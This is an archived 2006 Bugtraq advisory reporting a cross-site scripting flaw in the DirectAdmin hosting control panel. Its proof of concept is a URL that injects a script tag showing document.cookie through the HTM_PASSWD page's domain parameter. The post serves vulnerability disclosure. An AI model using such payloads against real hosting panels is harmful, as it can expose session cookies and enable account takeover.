| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 27 Apr 2006 04:29:05 -0000 From: outlaw@...a-security.net To: bugtraq@...urityfocus.com Subject: XSS Attack On DirectAdmin Hosting Managment #''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' #Aria-Security.net Advisory #Discovered by: O.U.T.L.A.W #Outlaw@...a-security.net #Gr33t to:A.u.r.a & R@...N & Cl0wn & Dtrap #''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ? Software: DirectAdmin ? Support Website: http://www.Directadmin.com ? advisory:http://www.aria-security.net/advisory/hm/directadmin.txt ? Summary: DirectAdmin Is A Hosting Managment System ? Tested On: http://www.directadmin.com/demo.html ? Proof of Concept: LOCAL XSS attack: http://www.directadmin.com:2222/HTM_PASSWD?domain=".><script>alert(document.cookie)</script><!-- ?Solution: ?contact advisory@...a-security.net
Powered by blists - more mailing lists